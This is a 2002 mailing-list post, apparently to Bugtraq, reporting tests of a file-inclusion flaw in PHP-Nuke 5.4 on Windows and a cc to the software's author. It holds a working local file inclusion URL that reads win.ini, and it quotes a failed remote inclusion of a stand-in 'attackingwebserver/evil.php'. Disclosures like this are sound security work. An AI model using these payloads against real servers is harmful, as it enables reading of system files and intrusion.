Re: PHP-Nuke allows Command Execution & Much more

From: RoMaNSoFt (romanat_private)
Date: Thu Jan 24 2002 - 08:18:08 PST

    On Mon, 21 Jan 2002 09:48:16 -0700 (MST), you wrote:

    >Roman,
    >
    >I'll approve the post you sent yesterday.

     Dave, I haven't seen my post in bugtraq. Perhaps did you forget it?
    I've included the fixed version of the post so you can directly cc to
    bugtraq, if you consider it appropiate. Cheers.

     --Rom.

    ------------------------

     Hi. I did some quick tests on a php-nuke running on Apache for
    *Windows*. PHPNuke version I tested was 5.4 (which is the last release
    of phpnuke at the time of testing). I couldn't reproduce your exploit.
    I always get something like:

    Warning: Failed opening 'http://attackingwebserver/evil.php' for
    inclusion (include_path='') in c:\php\index.php on line 113

     Nevertheless I realized that this other URL works:
    http://victimserver/index.php?file=c:\winnt\win.ini

     The former exploit shows the contens of win.ini file. At least it
    worked for me :-)

     Since phpnuke  tested version is the last version at the time of
    writing, I cc'ed this to Francisco Burzi (phpnuke author) 'cause it
    seems like new stuff. This happened during last week.

    Greetz,
     --RoMaNSoFt